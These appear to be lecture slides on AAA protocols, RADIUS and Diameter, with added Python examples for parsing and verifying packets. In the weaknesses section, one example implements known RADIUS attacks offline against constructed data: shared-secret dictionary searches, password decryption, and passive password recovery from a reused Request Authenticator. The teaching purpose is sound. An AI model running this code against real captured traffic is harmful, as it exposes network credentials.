
Authentication, Authorization and Accounting (AAA) is a framework for intelligently controlling access to computer network resources, enforcing policies, auditing usage, and providing the information necessary to bill for services. Together these processes are considered essential for effective network management and security.

Some of the protocols used in AAA are listed below:
CHAP: Challenge Handshake Authentication Protocol (a PPP authentication method; the NAS forwards the challenge and the client's response to the AAA server)
DIAMETER: designed to replace RADIUS
PAP: Password Authentication Protocol (a PPP authentication method; the password reaches the NAS in the clear)
RADIUS: Remote Authentication Dial-In User Service

What is 3GPP?
3GPP stands for Third Generation Partnership Project. This group includes telecommunications companies from Japan, South Korea, China, North America and Europe.

The Partners are six Standards Developing Organizations: two from Japan and one each from China, Korea, the USA and Europe.

Contribution-driven companies participate in 3GPP through their membership of one of these Organizational Partners. Currently there are over 350 Individual Members (Operators, Vendors, Regulators) and 12 Market Representation Partners (see final slide); these organisations give perspectives on market needs and drivers.

3GPP prepares and maintains specifications for the following technologies:
GSM, i.e. all of the technologies on the GSM evolution path: GPRS, EDGE
W-CDMA FDD (Frequency Division Duplex)
TD-CDMA TDD (Time Division Duplex) in High Chip Rate and Low Chip Rate (TD-SCDMA) modes

Example Individual Members: BT, NTT DoCoMo

The Enhanced UTRAN (E-UTRAN) will:
be optimised for mobile speeds of 0 to 15 km/h
support, with high performance, speeds between 15 and 120 km/h
maintain mobility at speeds between 120 and 350 km/h, and even up to 500 km/h depending on the frequency band
support voice and real-time services over the entire speed range with quality at least as good as UTRAN

3GPP Specified Radio Interfaces
2G radio: GSM, GPRS, EDGE
3G radio: WCDMA, HSPA, LTE
4G radio: LTE Advanced
3GPP Core Network
2G/3G: GSM core network
3G/4G: Evolved Packet Core (EPC)
3GPP Service Layer
GSM services
IP Multimedia Subsystem (IMS)
Multimedia Telephony (MMTEL)
Support of messaging and other OMA functionality
Emergency services and public warning
Etc.

TSG RAN Objectives
Define and further develop the UMTS (WCDMA and TDD, including TD-SCDMA) Radio Access Network
Specify tests for the User Equipment as well as the Base Station
TSG RAN Organization: five subgroups
WG1 specifies Layer 1 (the physical layer)
WG2 specifies the signalling over the radio interface
WG3 specifies the architecture and the interfaces within the Access Network
WG4 specifies the radio performance requirements, including test specifications for the Base Station
WG5 specifies tests for the User Equipment, including core network aspects

Introduction
AUTHENTICATION is the process in which an entity's identity is verified, typically by the entity providing evidence that it holds a specific digital identity, such as an identifier and the corresponding credentials. Examples of credentials are passwords, one-time tokens, digital certificates and phone numbers (calling/called). AUTHORIZATION is the process of granting or denying access to a network resource. Most computer security systems are based on a two-step process: the first stage is authentication, which ensures that a user is who he or she claims to be; the second stage is authorization, which grants the user access to particular resources based on that established identity. ACCOUNTING is the process of keeping track of a user's activity while accessing network resources, including the amount of time spent on the network, the services accessed there, and the amount of data transferred during the session. Accounting data is used for trend analysis, capacity planning, billing and cost allocation.

We divide AAA communications into the following categories: Client to Policy Enforcement Point (PEP), PEP to Policy Decision Point (PDP), Client to PDP, and PDP to Policy Information Point (PIP). For easy reference, the AAA flow diagram from Part One of this article is reproduced here.

Fig 1: A Client Connects to a AAA-Protected Network

Remote Authentication Dial In User Service (RADIUS) is a networking protocol that provides centralized Authentication, Authorization, and Accounting (AAA) management for computers to connect and use a network service. RADIUS was developed by Livingston Enterprises, in 1991.
RADIUS serves three functions:
1. to authenticate users or devices before granting them access to a network,
2. to authorize those users or devices for certain network services, and
3. to account for usage of those services.

1. The user contacts the website and is presented with a login page.
2. A RADIUS Access-Request is sent from the SSL-VPN to the RADIUS server.
3. The RADIUS server returns an Access-Accept with authorization information.
4. The user accesses the Intranet via the SSL-VPN portal.

Attribute value pair:

Fig2 : Structure of RADIUS

1. The user initiates PPP authentication to the NAS.
2. The NAS prompts for username and password (if Password Authentication Protocol [PAP]) or sends a challenge (if Challenge Handshake Authentication Protocol [CHAP]).
3. The user replies.
4. The RADIUS client sends the username and the hidden password to the RADIUS server. For PAP the User-Password attribute is XORed with an MD5 keystream derived from the shared secret and the Request Authenticator, which is obfuscation rather than real encryption; for CHAP the challenge and the response are forwarded instead.
5. The RADIUS server responds with Accept, Reject, or Challenge.
6. The RADIUS client acts upon the services and service parameters bundled with the Accept or Reject.

The RADIUS server authenticates nemo and sends an Access-Accept UDP packet to the NAS telling it to telnet nemo to host 192.168.1.3. The Response Authenticator is a 16-octet MD5 checksum of the Code (2), Identifier (0), Length (38), the Request Authenticator of the Access-Request being answered, the attributes in this reply, and the shared secret.

Example response packet (hex):
02 00 00 26 86 fe 22 0e 76 24 ba 2a 10 05 f6 bf
9b 55 e0 b2 06 06 00 00 00 01 0f 06 00 00 00 00
0e 06 c0 a8 01 03

Field breakdown (octets):
1  Code = Access-Accept (2)
1  Identifier = 0 (same as in the Access-Request)
2  Length = 38
16 Response Authenticator
Attribute list:
6  Service-Type (6) = Login (1)
6  Login-Service (15) = Telnet (0)
6  Login-IP-Host (14) = 192.168.1.3
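The following is an added example (not code from the original slides): a small parser for the RADIUS packet layout shown above, plus the Response Authenticator computation and the check a NAS must perform before acting on a server reply. It decodes the Access-Accept bytes from the slide; the shared secret and Request Authenticator used for the verification round trip are constructed values, since the matching Access-Request is not on the page.

```python
# Added example (not from the original slides): parse a RADIUS packet and
# verify its Response Authenticator, which RFC 2865 section 3 defines as
#   ResponseAuth = MD5(Code + ID + Length + RequestAuth + Attributes + Secret)
import hashlib
import hmac
import struct
from ipaddress import IPv4Address

CODE_NAMES = {1: "Access-Request", 2: "Access-Accept", 3: "Access-Reject",
              11: "Access-Challenge"}
ATTR_NAMES = {1: "User-Name", 2: "User-Password", 4: "NAS-IP-Address",
              5: "NAS-Port", 6: "Service-Type", 14: "Login-IP-Host",
              15: "Login-Service"}

def parse_attributes(data):
    """Walk the attribute list: each entry is Type(1) Length(1) Value(Length-2)."""
    attrs, i = [], 0
    while i < len(data):
        if i + 2 > len(data):
            raise ValueError("truncated attribute header")
        atype, alen = data[i], data[i + 1]
        if alen < 2 or i + alen > len(data):   # Length covers Type and Length too
            raise ValueError("bad attribute length")
        attrs.append((atype, data[i + 2:i + alen]))
        i += alen
    return attrs

def parse_radius(packet):
    """Split a packet into Code(1) Identifier(1) Length(2) Authenticator(16) Attributes."""
    if len(packet) < 20:
        raise ValueError("packet shorter than the RADIUS header")
    code, ident, length = struct.unpack("!BBH", packet[:4])
    if length < 20 or length > len(packet):
        raise ValueError("Length field does not fit the packet")
    return {"code": code, "id": ident, "length": length,
            "authenticator": packet[4:20],
            "attrs": parse_attributes(packet[20:length])}

def response_authenticator(code, ident, request_auth, attrs, secret):
    """MD5 over the response header, the Request Authenticator it answers,
    the attributes, and finally the shared secret."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()

def build_response(code, ident, request_auth, attrs, secret):
    """What the server sends: header, computed authenticator, attributes."""
    auth = response_authenticator(code, ident, request_auth, attrs, secret)
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + auth + attrs

def verify_response(packet, request_auth, secret):
    """What the NAS must check before acting on an Accept/Reject/Challenge:
    recompute the authenticator and compare in constant time."""
    p = parse_radius(packet)
    expected = response_authenticator(p["code"], p["id"], request_auth,
                                      packet[20:p["length"]], secret)
    return hmac.compare_digest(expected, p["authenticator"])

def describe(packet):
    """Decode the header and the integer/address attributes by name."""
    p = parse_radius(packet)
    out = {"code": CODE_NAMES.get(p["code"], p["code"]),
           "id": p["id"], "length": p["length"]}
    for atype, value in p["attrs"]:
        name = ATTR_NAMES.get(atype, "Attr-%d" % atype)
        if atype == 14:                      # Login-IP-Host is a 4-octet address
            out[name] = str(IPv4Address(value))
        elif len(value) == 4:                # integer-valued attributes
            out[name] = int.from_bytes(value, "big")
        else:
            out[name] = value
    return out

# The Access-Accept reproduced on the slide (RFC 2865 section 7.1 example).
SLIDE_ACCEPT = bytes.fromhex(
    "02 00 00 26 86 fe 22 0e 76 24 ba 2a 10 05 f6 bf 9b 55 e0 b2"
    "06 06 00 00 00 01 0f 06 00 00 00 00 0e 06 c0 a8 01 03")

def roundtrip_demo(secret=b"testing123", req_auth=bytes(range(16))):
    """Constructed values (assumptions, not from the slide): a shared secret and
    the Request Authenticator of the request being answered. Returns
    (genuine verifies, wrong secret verifies, tampered packet verifies)."""
    accept = build_response(2, 0, req_auth, SLIDE_ACCEPT[20:], secret)
    forged = accept[:-1] + bytes([accept[-1] ^ 0x01])   # flip last octet of Login-IP-Host
    return (verify_response(accept, req_auth, secret),
            verify_response(accept, req_auth, b"wrong-secret"),
            verify_response(forged, req_auth, secret))

if __name__ == "__main__":
    print(describe(SLIDE_ACCEPT))
    print(roundtrip_demo())   # (True, False, False)
```

The tampered case is the point of the check: the Response Authenticator binds the reply to the secret and to the specific Request Authenticator, so an injected Access-Accept (or one whose Login-IP-Host was altered in transit) fails verification unless the attacker knows the secret.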

RADIUS key features:
Client/Server model (the NAS is the client of the RADIUS server)
Network security (transactions between client and server are protected by a shared secret that is never sent over the network; user passwords are hidden on the wire)
Flexible authentication mechanisms (PAP, CHAP, UNIX login and others)
Extensible protocol (attribute-value pairs; new attributes can be added without disturbing existing implementations)

Response Authenticator based shared secret attack: the attacker listens to Access-Requests and the server's responses. Everything that the Response Authenticator hashes before the secret, MD5(Code + ID + Length + ReqAuth + Attributes), is visible on the wire, so the attacker precomputes that MD5 state once and then performs an exhaustive (or dictionary) search on the shared secret, appending each candidate to the saved state and comparing the result with the captured authenticator.
User-Password attribute based shared secret attack: the attacker attempts a connection to the NAS with a password he knows and intercepts the resulting Access-Request. XORing the first 16 octets of the User-Password attribute with the known (padded) password yields MD5(Secret + ReqAuth), and an exhaustive search on the shared secret is run against that value.
User-Password based password attack: with MD5(Secret + ReqAuth) in hand, the attacker performs an exhaustive or dictionary attack on a user's password, XORing each candidate with that MD5 value and sending it each time in the User-Password attribute of a replayed request. This is possible because the Access-Request packet carries no authentication of its own.

Shared secret hygiene: many deployments use one secret for all NAS devices, so the server effectively views them as a single client and a compromise at any one of them exposes all; secrets are often short (small key size), which makes the searches above easy.
Request Authenticator based attacks (the Request Authenticator must be unique and unpredictable, but implementations with a weak PRNG repeat it):
Passive User-Password compromise through repeated Request Authenticators: the attacker records User-Password attributes together with their Request Authenticators. Two requests with the same Request Authenticator (and the same secret) are hidden with the same MD5 keystream, so the XOR of the two attributes is the XOR of the two passwords, and one known password reveals the other without the secret.
Active User-Password compromise through repeated Request Authenticators: the attacker builds a dictionary as before. When he predicts that he can cause the NAS to use a certain Request Authenticator, he connects to it with a password he knows and intercepts the Access-Request.
Replay of server responses through repeated Request Authenticators: the attacker builds a dictionary of Request Authenticator, Identifier and the entire server response. Most server responses will be Access-Accepts, so a later request that reuses the same Request Authenticator and Identifier can be answered with a recorded Access-Accept without knowing the secret.

RADIUS has several weaknesses:
The User-Password attribute is hidden with an ad hoc MD5-based stream cipher rather than a proper encryption mode.
The Access-Request transaction is not authenticated at all. (The optional Message-Authenticator attribute of RFC 2869, an HMAC-MD5 over the packet, later closed this gap for EAP exchanges, but ordinary PAP/CHAP requests remain unauthenticated unless it is used.)
The RADIUS specification should require each client to use a different shared secret. It should also require the shared secret to be a random bit string at least 16 octets long, generated by a cryptographically secure PRNG.
DIAMETER was brought in to replace RADIUS and fix some of these flaws.
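The following is an added example (not code from the original slides) that runs the attacks described above against a constructed RADIUS exchange: the Response Authenticator based and User-Password based shared-secret searches, the recovery of a captured password once the secret is known, and the passive password compromise through a repeated Request Authenticator. The shared secret, Request Authenticator, passwords and wordlist are all made up; nothing is sent on a network.

```python
# Added example (not from the original slides): the shared-secret and
# password attacks described above, run against a constructed RADIUS
# exchange with a weak shared secret. Nothing here touches a network.
import hashlib
import struct

def hide_password(password, secret, req_auth):
    """RFC 2865 section 5.2 User-Password hiding: pad to a multiple of 16,
    then XOR block i with MD5(secret + req_auth) for the first block and
    MD5(secret + previous ciphertext block) afterwards. This is the ad hoc
    MD5-based stream cipher the slides refer to."""
    padded = password + b"\x00" * (-len(password) % 16)
    out, prev = b"", req_auth
    for i in range(0, len(padded), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(x ^ y for x, y in zip(padded[i:i + 16], keystream))
        out, prev = out + block, block
    return out

def unhide_password(hidden, secret, req_auth):
    """Inverse of hide_password (what the server does)."""
    out, prev = b"", req_auth
    for i in range(0, len(hidden), 16):
        keystream = hashlib.md5(secret + prev).digest()
        out += bytes(x ^ y for x, y in zip(hidden[i:i + 16], keystream))
        prev = hidden[i:i + 16]
    return out.rstrip(b"\x00")

def access_accept(ident, req_auth, attrs, secret):
    """Server reply: Code 2, header, MD5 Response Authenticator, attributes."""
    header = struct.pack("!BBH", 2, ident, 20 + len(attrs))
    auth = hashlib.md5(header + req_auth + attrs + secret).digest()
    return header + auth + attrs

def crack_secret_from_response(req_auth, response, candidates):
    """Response Authenticator based attack. Everything hashed before the
    secret is on the wire, so the MD5 state for that prefix is computed once;
    each candidate secret is only appended to a copy of that state."""
    header, auth, attrs = response[:4], response[4:20], response[20:]
    prefix = hashlib.md5(header + req_auth + attrs)
    for cand in candidates:
        h = prefix.copy()
        h.update(cand)
        if h.digest() == auth:
            return cand
    return None

def crack_secret_from_known_password(req_auth, hidden, known_pw, candidates):
    """User-Password attribute based attack. The attacker logs in through the
    NAS with a password of his own choice and captures the request:
    hidden[:16] XOR padded_password[:16] == MD5(secret + req_auth), which is
    then matched against candidate secrets."""
    padded = known_pw + b"\x00" * (-len(known_pw) % 16)
    target = bytes(x ^ y for x, y in zip(hidden[:16], padded[:16]))
    for cand in candidates:
        if hashlib.md5(cand + req_auth).digest() == target:
            return cand
    return None

def recover_from_repeated_req_auth(hidden_known, known_pw, hidden_victim):
    """Passive attack on a repeated Request Authenticator. Two requests with
    the same req_auth (and secret) share the first keystream block, so
    hidden_known XOR padded_known XOR hidden_victim is the victim's password
    (first 16 octets) and no secret is needed at all."""
    padded = known_pw + b"\x00" * (-len(known_pw) % 16)
    first = bytes(a ^ b ^ c for a, b, c in
                  zip(hidden_known[:16], padded[:16], hidden_victim[:16]))
    return first.rstrip(b"\x00")

# Constructed capture (assumptions): a dictionary-word shared secret, a
# Request Authenticator the NAS happens to reuse, a victim login and the
# attacker's own login through the same NAS.
SECRET = b"s3cret"
REQ_AUTH = bytes.fromhex("00112233445566778899aabbccddeeff")
WORDLIST = [b"password", b"radius", b"s3cret", b"testing123"]

def run_attacks():
    victim_hidden = hide_password(b"arctangent", SECRET, REQ_AUTH)
    reply = access_accept(0, REQ_AUTH, b"\x06\x06\x00\x00\x00\x01", SECRET)
    mine_hidden = hide_password(b"attacker-pw", SECRET, REQ_AUTH)

    via_response = crack_secret_from_response(REQ_AUTH, reply, WORDLIST)
    via_password = crack_secret_from_known_password(REQ_AUTH, mine_hidden,
                                                    b"attacker-pw", WORDLIST)
    # With the secret known, every captured User-Password can be opened.
    victim_pw = unhide_password(victim_hidden, via_response, REQ_AUTH)
    # Without the secret, reuse of REQ_AUTH alone leaks the password.
    victim_pw_passive = recover_from_repeated_req_auth(
        mine_hidden, b"attacker-pw", victim_hidden)
    return via_response, via_password, victim_pw, victim_pw_passive

if __name__ == "__main__":
    print(run_attacks())
```

The two secret searches cost one MD5 per candidate, which is why a short dictionary word falls immediately while a random 16-octet secret is out of reach; the repeated-authenticator attack needs no search at all, which is why the Request Authenticator must come from a cryptographically secure random source.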

Diameter is an AAA (Authentication, Authorization and Accounting) protocol for applications such as network access or IP mobility. The basic concept is to provide a base protocol that can be extended in order to provide AAA services to new access technologies. Diameter is intended to work in both local and roaming AAA situations. Diameter operates on top of reliable transport protocols, TCP or SCTP, rather than UDP.

Fig: AVP format

Fig: DIAMETER packet structure

Better proxying
Better session control
Better security
Interoperability
Better transport

Fig: Diameter protocol reaction time

Fig: RADIUS protocol reaction time

Fig: Traffic operated during connection to the secondary server

Fig: Traffic operated during connection to the primary server

Characteristic / RADIUS Deficiency / DIAMETER Improvement

Characteristic: Strict limitation of attribute data
RADIUS deficiency: Only 1 byte is reserved for the length of a data field in its attribute header (max. 255, which includes the 2-byte Type/Length header, so at most 253 bytes of data per attribute)
DIAMETER improvement: Reserves 3 bytes (24 bits) for the length of an AVP (max. 16,777,215 including the AVP header)

Characteristic: Inefficient retransmission algorithm
RADIUS deficiency: Only 1 byte as identifier field to identify retransmissions. This limits the number of requests that can be pending per client (max. 255)
DIAMETER improvement: Reserves 4 bytes for this purpose, as separate Hop-by-Hop and End-to-End identifiers (max. 2^32)

Characteristic: Inability to control flow to servers
RADIUS deficiency: Operates over User Datagram Protocol (UDP) and has no standard scheme to regulate UDP flow
DIAMETER improvement: Runs over TCP or SCTP, whose windowing scheme regulates the flow of packets and provides congestion control

Characteristic: No support for vendor-specific commands
RADIUS deficiency: Supports vendor-specific attributes, but not vendor-specific commands
DIAMETER improvement: Supports vendor-specific commands (and vendor-specific AVPs) through its Vendor-ID and Application-ID fields
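The following is an added example (not code from the original slides) of the Diameter message header and AVP layout that the table contrasts with RADIUS, as specified in RFC 6733: the 24-bit AVP length, the 24-bit command code and the 32-bit Hop-by-Hop and End-to-End identifiers. The command and AVP codes used (CER = 257, Origin-Host = 264, Origin-Realm = 296, Vendor-Id = 266) are the RFC's; the host names, the identifier values, the vendor id 99999 and the vendor-specific AVP code 1000 are made up for the example.

```python
# Added example (not from the original slides): encoder/decoder for the
# RFC 6733 Diameter header and AVP formats, showing the wider fields that the
# table above contrasts with RADIUS. Host names, identifiers, the vendor id
# 99999 and AVP code 1000 are constructed values.
import struct

AVP_FLAG_V, AVP_FLAG_M = 0x80, 0x40      # Vendor-specific, Mandatory
CMD_FLAG_R = 0x80                        # Request (clear in an answer)
RADIUS_MAX_ATTR_DATA = 253               # 1-byte Length minus Type and Length

def encode_avp(code, data, mandatory=True, vendor_id=None):
    """AVP = Code(4) Flags(1) Length(3) [Vendor-ID(4)] Data, padded to 4 octets.
    Length counts the header and data but not the padding."""
    flags = AVP_FLAG_M if mandatory else 0
    vendor = b""
    if vendor_id is not None:
        flags |= AVP_FLAG_V
        vendor = struct.pack("!I", vendor_id)
    length = 8 + len(vendor) + len(data)
    if length >= 1 << 24:
        raise ValueError("AVP exceeds the 24-bit length field")
    avp = (struct.pack("!I", code) + bytes([flags]) + length.to_bytes(3, "big")
           + vendor + data)
    return avp + b"\x00" * (-len(avp) % 4)

def decode_avps(buf):
    """Parse consecutive AVPs, honouring the V flag and the 4-octet padding."""
    avps, i = [], 0
    while i < len(buf):
        if i + 8 > len(buf):
            raise ValueError("truncated AVP header")
        code = struct.unpack("!I", buf[i:i + 4])[0]
        flags = buf[i + 4]
        length = int.from_bytes(buf[i + 5:i + 8], "big")
        hdr = 12 if flags & AVP_FLAG_V else 8
        if length < hdr or i + length > len(buf):
            raise ValueError("bad AVP length")
        vendor_id = struct.unpack("!I", buf[i + 8:i + 12])[0] if hdr == 12 else None
        avps.append({"code": code, "mandatory": bool(flags & AVP_FLAG_M),
                     "vendor_id": vendor_id, "data": buf[i + hdr:i + length]})
        i += length + (-length % 4)      # step over the padding as well
    return avps

def encode_message(command, app_id, hop_by_hop, end_to_end, avps, request=True):
    """Header = Version(1)=1 Length(3) Flags(1) Command-Code(3)
    Application-ID(4) Hop-by-Hop(4) End-to-End(4), followed by the AVPs."""
    body = b"".join(avps)
    return (bytes([1]) + (20 + len(body)).to_bytes(3, "big")
            + bytes([CMD_FLAG_R if request else 0]) + command.to_bytes(3, "big")
            + struct.pack("!III", app_id, hop_by_hop, end_to_end) + body)

def decode_message(buf):
    """Check the version and length, then split header fields and AVPs."""
    if len(buf) < 20 or buf[0] != 1:
        raise ValueError("not a Diameter version 1 message")
    length = int.from_bytes(buf[1:4], "big")
    if length > len(buf) or length % 4:
        raise ValueError("bad message length")
    app_id, hop_by_hop, end_to_end = struct.unpack("!III", buf[8:20])
    return {"request": bool(buf[4] & CMD_FLAG_R),
            "command": int.from_bytes(buf[5:8], "big"),
            "app_id": app_id, "hop_by_hop": hop_by_hop, "end_to_end": end_to_end,
            "avps": decode_avps(buf[20:length])}

def example_cer():
    """A Capabilities-Exchange-Request carrying one AVP far larger than any
    RADIUS attribute could hold (the 1000-byte payload is constructed)."""
    big = b"x" * 1000                     # > RADIUS_MAX_ATTR_DATA, legal here
    avps = [encode_avp(264, b"nas.example.com"),
            encode_avp(296, b"example.com"),
            encode_avp(266, struct.pack("!I", 0)),
            encode_avp(1000, big, mandatory=False, vendor_id=99999)]
    return encode_message(257, 0, 0x12345678, 0x9abcdef0, avps)

if __name__ == "__main__":
    msg = decode_message(example_cer())
    print(msg["command"], hex(msg["hop_by_hop"]), [a["code"] for a in msg["avps"]])
```

The decoder rejects an AVP whose 24-bit length runs past the buffer or is shorter than its own header; a parser that skips this check is exactly where length-field confusion bugs live, and the same care applies to the 1-byte RADIUS attribute length.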

Consumer-Managed Applications
Enterprise-Managed Applications
Carrier-Managed Applications
Emerging Applications

Security and Identity Convergence

User-Centric AAA
Federation

The RADIUS protocol gives fast user identification with few packets, but it cannot control its traffic or its peers in the communication chain, and it is ineffective in overly crowded networks. The Diameter protocol is recommended for congested networks because it can control its traffic (reliable transport with flow control), solves server inaccessibility problems much faster (peers are monitored and failover is explicit at the application level), and is better equipped for the problems encountered in present-day networks.


Thank you
